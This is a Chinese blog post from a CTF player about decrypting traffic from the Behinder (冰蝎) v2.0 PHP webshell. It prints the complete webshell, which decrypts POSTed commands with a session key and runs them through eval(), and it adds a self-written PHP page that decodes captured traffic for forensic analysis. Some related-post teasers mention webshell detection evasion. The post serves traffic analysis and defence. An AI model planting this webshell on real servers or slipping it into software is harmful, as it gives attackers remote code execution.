冰蝎PHP码流量还原

最新推荐文章于 2024-04-09 05:34:11 发布
最新推荐文章于 2024-04-09 05:34:11 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: ctf 渗透 HTML语言学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hibari_18/article/details/103369006
版权
渗透 同时被 3 个专栏收录
10 篇文章 0 订阅
订阅专栏
ctf
2 篇文章 0 订阅
订阅专栏
HTML语言学习
2 篇文章 0 订阅
订阅专栏

0x01前言

之前打3ctf的时候看见了一道冰蝎流量还原的misc,之后觉得还挺有意思的,毕竟之前网站被种过马 ,弄出来之后搞个工具结合全流量设备或者wireshark的包来还原攻击者到底做了哪些动作,故有了此文。

0x02环境准备

phpstudy(注意在php环境中要开一下php_openssl,默认好像是没开的)
冰蝎v2.0

0x03过程

首先贴一下一般用的冰蝎的PHP码:

<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
}
?>

加密过程:
第一次(GET)请求生成16位的秘钥,第二次(POST)用秘钥对发送和接收的内容进行base64加密、AES加密(AES-128-CBC,OPENSSL_ZERO_PADDING)。
解密过程:
先用AES解密,再用base64解密。

解密脚本如下(我这个做的是网页版的,界面很友好!如果想简化可以只要<?php>标签内的内容,记得把网页传参的变量改成普通变量):

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>PHP冰蝎解码</title>
</head>
<body>
<?php
error_reporting(0);
function aes_decrypt($data,$key){
    return openssl_decrypt($data,'aes-128-cbc',$key,OPENSSL_ZERO_PADDING);
} 

$text=$_POST['text'];
$key=$_POST['key'];
#'dMbFVmyUlb8MNJR1iwAN6n0CrkPTl/pfedppzkLxWWzQvkhWqXgA6UMbiqkE0LNg';
#'d59042be6e437849';
#{"status":"c3VjY2Vzcw==","msg":"cEBzc3cwcmQ="}
$s=aes_decrypt($text,$key);

preg_match_all("/\'(.*?)\'/", $s,$content);
$s1=str_replace("'", "", $content[0][0]);

?>
<h1>冰蝎-PHP 流量解码</h1>
<form action="" method="post">
    <table >
        <tr>
            <td  align="center">密钥</td>
            <td><input type="text" name="key" maxlength="16" value="<?php if(!empty($key)){echo $key;}?>"></td>
        </tr>
        <tr>
            <td  align="center">密文</td>
            <td><textarea  name="text" style="height:100px;width:450px;" >
                <?php if(!empty($text)){echo $text;}?>
            </textarea> </td>
        </tr>
        <tr>
            <td> <input type="submit" value="提交"></td>
        </tr>
    </table>
</form>
<?php
print "解密后流量:<br>";
print $s;
print "<br><br>base64解码:<br>";
//print $s1;
//print base64_decode($s1);改成htmlentities的了,感谢大佬指点!
print htmlentities(base64_decode($s1));
?>
</body>
</html><br>

实现之后的效果如下:
请不起美工2333

0x04写在最后

冰蝎码的流量加密确实为后渗透提供了极大的便利,不过以后可能更进一步隐藏16位AES秘钥或者其他方式进行加密,本文只针对v2.0这个版的进行了解密,毕竟技术还比较菜。等有时间把jsp版的也做了!立个flag

hibari_18
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
逆向初探
悦分享
08-04 1065
其实理解整个编写思路并不难,里面的功能(获取服务器基本信息,执行系统命令,文件管理,数据库管理,反弹meterpreter,执行自定义代码等)大致的过程都比较类似。
快速消耗流量PHP源码 流量测压
07-10
PHP流量测压源码,可能大家很想要试试自己的手机流量套餐在流量超过某个数值时会不会限速,限速多少,通常大家可能使用别人的测速网站来测, 现在的这个源码可以拿来快速刷流量的一个小工具!可以让访问当前页流量快速消耗! 源码支持上传二级目录访问,上传虚拟空间即可访问!PHP版本;5.6
的原理与安装使用,2024年网络安全者未来的出路在哪里
最新发布
m0_60635176的博客
04-09 1021
觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**[外链图片转存中…(img-6UJpGMns-1712612036038)]
php马静态免杀
qq_61807674的博客
04-02 1124
其实还有小马哥的腾讯哈勃,但是那个不支持上传webshell,上传压缩包虽然行,但是如果压缩一遍了连原马都查杀不出来,就当图一乐了,就不放出来了.....大部分云沙箱和在线查杀我都基本试过了,基本除了安恒云沙箱都能稳过(ah一生之敌),因为我的测试环境是php7.3往上了,没法用assert拼接执行,估计是检测到了eval执行字符串代码,所以静态检测没过,太丢脸就不放截图啦,师傅们可以按着自己的想法改改试试()但是也正常,只是做了基础的静态免杀而已,其实处理还是不够到位的,心态要端正,很不错了!
记一次解密wireshark抓取的通信流量
m0_74131821的博客
04-21 1638
由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战
4.0 加密的代码
震山的博客
09-12 1591
在使用进行 WebShell 的时候,它到底发了那些代码呢?
流量分析
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 424
每次Content-Length 较大,还都编码。每次Content-Length 较大,还都编码。
记一次流量分析&代码分析-
pingan233的博客
02-22 3242
流程图如下:是先请求服务端,服务端判断请求之后生成一个128位的随机数,并将这个128位的随机数写入到session里面,并将这个128位的随机数返回给客户端,但是客户端并不会使用这个key作为之后的通讯的key,而是会继续重复上面过程,不断获取key,直到满足特定条件之后,才会确定是最终的key。客户端会保存这个key和响应报文里面的set-cookie的值。这个key就是之后客户端和服务端进行通讯的密匙。检测请求方式:Request.method= GET。
常见的webshell的流量特征和检测思路
weixin_45585955的博客
04-11 6274
所以分析如上:该流量是WebShell链接流量的第一段链接流量,其中特征主要在i=A&z0=GB2312,菜刀链接JSP木马时,第一个参数定义操作,其中参数值为A-Q,如i=A,第二个参数指定编码,其参数值为编码,如z0=GB2312,有时候z0后面还会接着又z1=、z2=参数用来加入攻击载荷。最后传给cmd的这些流量字符中有自己的特征,1、都是系统命令;2、必须以分号结尾;至此,成为了一个完美的开箱即用的工具,本体内存马免杀,流量免杀,功能齐全,兼容性好,在连续几年的攻防演练中,成为最热门的工具。
-2.0.1(解压密码:111)
08-23
1.增强了PHP的兼容性,PHP 5.2~PHP 7.2.15全版本支持,加密方式根据服务器端支持情况动态选择,不再依赖openssl扩展。 2.虚拟终端命令执行结果增加了右键复制功能。 3.数据库查询结果可复制(单个单元格、单行),可...
php流量统计功能的实现代码
10-27
php实现的流量统计功能代码,本代码仅供学习交流,其中必有不妥之处。请见谅
php数据库备份还原类分享
12-19
php/** * 数据库备份还原类 * @author xialeistudio * Class DatabaseTool */class DatabaseTool{ private $handler; private $config = array( ‘host’ => ‘localhost’, ‘port’ => 3306, ‘user’ =>...
,从入门到魔改(续)1
08-03
0x02 通用篇本章节简单的介绍一下 PHP、JSP、ASP 版本””的通用特征,具体原理和修改思路可以参考上一篇文章:《,从入门到魔改》密钥交换时的U
【CTF WriteUp】2023数字中国创新大赛网络数据安全赛道决赛WP(2)
cccchhhh6819的博客
04-27 2584
菜的要死,各种不会,答案也不全,凑合吧。
v2.0.1流量分析
A_991128a的博客
08-08 582
经过一系列的迭代,流量特征各有不同,我们以版本顺序探究流量的进化史1、自带webshell,我们以php的webshell为例(已加注释):[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YcUNPc4x-1691284675827)(https://image.3001.net/images/20220901/1662002545_631025711eac09769c395.png!small)]
2023年台州市第三届网络安全技能大赛(MISC)这是神马
Aluxian_的博客
10-08 786
2023年台州市第三届网络安全技能大赛(MISC)这是神马
工具的最新检测特征
securitypaper的博客
06-15 800
是一个大佬写的类似原来菜刀的webshell管理工具,具体实现可以参考[rebeyond 在先知的](https://xz.aliyun.com/u/8697)的实现文章,包括java、.net、php
渗透测试-流量加密之&蚁剑
热门推荐
道阻且长,行则将至。
11-08 1万+
文章目录前言 前言
4.0流量解密
热爱学习,喜欢折腾!
08-16 2628
在2022.7.25 v4.0 更新Behinder_v4.0,增加了诸多功能。本文以PHP为例4.0提供了三种方式异或、异或Base64、AES三种方式。总体来说4.0的流量解密和3.0的流量解密差不多。
如何识别webshell文件
07-14
识别RAT)Webshell 文件可以是一项复杂的任务,因为这种 Webshell 文件通常会采用各种隐蔽和加密技术来逃避检测。以下是一些常见的方法和指南,可用于帮助识别 Webshell 文件: 1. 文件名和路径:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值